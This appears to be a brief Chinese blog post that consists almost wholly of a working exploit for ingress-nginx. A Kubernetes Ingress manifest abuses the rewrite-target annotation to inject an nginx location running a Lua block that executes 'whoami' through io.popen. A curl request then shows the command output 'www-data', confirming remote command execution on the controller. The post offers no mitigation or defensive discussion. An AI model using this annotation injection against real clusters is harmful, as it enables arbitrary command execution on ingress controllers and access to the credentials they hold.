发布时间: 2023-11-16 文章作者: myluzh 分类名称: Kubernetes 朗读文章
apiVersion: networking.k8s.io/v1 kind: Ingress metadata: name: ingress-exploit annotations: kubernetes.io/ingress.class: "nginx" nginx.ingress.kubernetes.io/rewrite-target: | execute-command/ last; } location execute-command/ { content_by_lua_block { local handle = io.popen("whoami") local result = handle:read("*a") handle:close() ngx.say(result); } } location /fs/{ spec: rules: - host: exp.k8s.com http: paths: - path: / pathType: Prefix backend: service: name: exploit port: number: 80
curl http://exp.k8s.com/execute-command www-data #成功回显whoami的信息
发表评论